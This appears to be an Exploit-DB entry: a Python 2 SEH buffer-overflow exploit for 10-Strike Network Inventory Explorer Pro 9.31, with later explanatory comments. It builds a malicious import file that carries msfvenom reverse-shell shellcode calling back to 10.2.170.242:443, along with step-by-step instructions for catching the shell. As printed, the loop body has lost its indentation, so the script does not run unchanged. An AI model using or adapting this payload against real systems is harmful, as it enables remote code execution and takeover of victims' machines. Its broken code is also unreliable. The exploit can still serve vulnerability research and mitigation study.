10-Strike Network Inventory Explorer Pro 9.31 – Buffer Overflow (SEH)

  • 作者: ro0k
    日期: 2021-11-02
  • 类别:
    平台:
  • 来源: https://www.exploit-db.com/exploits/50472/
  • # Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)
    # Date: 2021-10-31
    # Exploit Author: ro0k
    # Vendor Homepage: https://www.10-strike.com/
    # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
    # Version: 9.31
    # Tested on: Windows 10 x64 Education 21H1 Build 19043.928 
    
    # Proof of Concept:
    # 1.Run python2 exploit.py to generate overflow.txt
    # 2.Transfer overflow.txt to the Windows 10 machine
    # 3.Setup Netcat listener on attacker machine 
    # 4.Open 10-Strike Network Inventory Explorer Pro
    # 5.Select Computers tab from the uppermost set of tabs
    # 6.Select From Text File option
    # 7.Open overflow.txt
    # 8.Receive reverse shell connection on attacker machine! 
    
    #!/usr/bin/env python
    # Purpose: write overflow.txt, a "computers from text file" import that this
    # version's importer copies into a fixed-size stack buffer, overwriting the
    # SEH record (see the PoC steps above). Everything below is Python 2 code
    # (step 1 says python2): the strings are byte strings, which is what lets
    # the "\x.." escapes reach the file unchanged. Under Python 3 the same
    # text-mode write would re-encode them and the file would differ.
    import struct
    
    # Bad-character probe: every byte value except the ones the importer
    # mangles or treats as a delimiter (NUL, tab, LF, CR, ':' and '\').
    # NOTE: charslist is never appended to `buffer` below — it is left over
    # from the bad-character enumeration step and is dead code in this script.
    charslist = "" 
    badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c] 
    
    # NOTE(review): as printed, the two lines under this `for` are not indented
    # (lost in transcription?), which is a SyntaxError; they were presumably the
    # loop body in the original.
    for i in range (0x00, 0xFF+1):
    if i not in badchars: 
    charslist += chr(i) 
    
    # Encoded reverse-shell payload; the generator command records that the
    # same bad-character set was excluded. Any network-level detection of this
    # sample keys on the outbound connection it makes, not on these bytes.
    #msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00\x09\x0a\x0d\x3a\x5c"
    shellcode = ("\xd9\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xc6\xbc\xd3\x19\xb1"
    "\x52\x83\xc0\x04\x31\x58\x13\x03\x9e\xaf\x31\xec\xe2\x38\x37"
    "\x0f\x1a\xb9\x58\x99\xff\x88\x58\xfd\x74\xba\x68\x75\xd8\x37"
    "\x02\xdb\xc8\xcc\x66\xf4\xff\x65\xcc\x22\xce\x76\x7d\x16\x51"
    "\xf5\x7c\x4b\xb1\xc4\x4e\x9e\xb0\x01\xb2\x53\xe0\xda\xb8\xc6"
    "\x14\x6e\xf4\xda\x9f\x3c\x18\x5b\x7c\xf4\x1b\x4a\xd3\x8e\x45"
    "\x4c\xd2\x43\xfe\xc5\xcc\x80\x3b\x9f\x67\x72\xb7\x1e\xa1\x4a"
    "\x38\x8c\x8c\x62\xcb\xcc\xc9\x45\x34\xbb\x23\xb6\xc9\xbc\xf0"
    "\xc4\x15\x48\xe2\x6f\xdd\xea\xce\x8e\x32\x6c\x85\x9d\xff\xfa"
    "\xc1\x81\xfe\x2f\x7a\xbd\x8b\xd1\xac\x37\xcf\xf5\x68\x13\x8b"
    "\x94\x29\xf9\x7a\xa8\x29\xa2\x23\x0c\x22\x4f\x37\x3d\x69\x18"
    "\xf4\x0c\x91\xd8\x92\x07\xe2\xea\x3d\xbc\x6c\x47\xb5\x1a\x6b"
    "\xa8\xec\xdb\xe3\x57\x0f\x1c\x2a\x9c\x5b\x4c\x44\x35\xe4\x07"
    "\x94\xba\x31\x87\xc4\x14\xea\x68\xb4\xd4\x5a\x01\xde\xda\x85"
    "\x31\xe1\x30\xae\xd8\x18\xd3\xdb\x1e\x88\xd1\xb4\x1c\xcc\x14"
    "\xfe\xa8\x2a\x7c\x10\xfd\xe5\xe9\x89\xa4\x7d\x8b\x56\x73\xf8"
    "\x8b\xdd\x70\xfd\x42\x16\xfc\xed\x33\xd6\x4b\x4f\x95\xe9\x61"
    "\xe7\x79\x7b\xee\xf7\xf4\x60\xb9\xa0\x51\x56\xb0\x24\x4c\xc1"
    "\x6a\x5a\x8d\x97\x55\xde\x4a\x64\x5b\xdf\x1f\xd0\x7f\xcf\xd9"
    "\xd9\x3b\xbb\xb5\x8f\x95\x15\x70\x66\x54\xcf\x2a\xd5\x3e\x87"
    "\xab\x15\x81\xd1\xb3\x73\x77\x3d\x05\x2a\xce\x42\xaa\xba\xc6"
    "\x3b\xd6\x5a\x28\x96\x52\x7a\xcb\x32\xaf\x13\x52\xd7\x12\x7e"
    "\x65\x02\x50\x87\xe6\xa6\x29\x7c\xf6\xc3\x2c\x38\xb0\x38\x5d"
    "\x51\x55\x3e\xf2\x52\x7c")
    
    # Distance from the start of the input to the SEH record, found with a
    # cyclic pattern (the crash value 41316841 is the pattern fragment that
    # landed in the handler slot). 213 bytes is the effective size of the
    # importer's buffer plus saved state; any line longer than that is the
    # trigger condition a validating parser should reject.
    #pattern_offset.rb -l 250 -q 41316841
    offset = 213
    
    # Next-SEH slot: a 2-byte short jump over the handler address, padded
    # with two NOPs to fill the 4-byte field.
    #nasm > jmp short 8
    nseh = "\xeb\x06\x90\x90"
    junk = "A" * (offset - len(nseh))
    
    # Handler slot: a pop/pop/ret gadget in the bundled sqlite3.dll. The mona
    # line below records why that module was usable: it is built without
    # SafeSEH, without ASLR/rebase and with fixed load address. That is the
    # mitigation gap — a /SAFESEH + /DYNAMICBASE build of sqlite3.dll (and
    # SEHOP on the host) would invalidate this gadget even with the overflow
    # present. Only the low bytes matter for the bad-char list; the gadget
    # address contains none of them.
    #0x61e012f6 : pop edi # pop ebp # ret|{PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\sqlite3.dll)
    seh = struct.pack("<I", 0x61e012f6)
    
    # Move the stack pointer away from the shellcode before the decoder stub
    # starts pushing, so its own writes do not clobber the payload.
    #metasm > sub esp,0x10
    subesp10="\x83\xec\x10"
    payload = shellcode
    
    # Final layout: [junk][nSEH][SEH][sub esp,0x10][shellcode].
    buffer = junk + nseh + seh + subesp10 + payload
    
    # Text-mode open/close with no `with`; in Python 2 "w" mode does not alter
    # the bytes, which this script depends on (see the note at the top).
    f = open("overflow.txt", "w")
    f.write(buffer)
    f.close()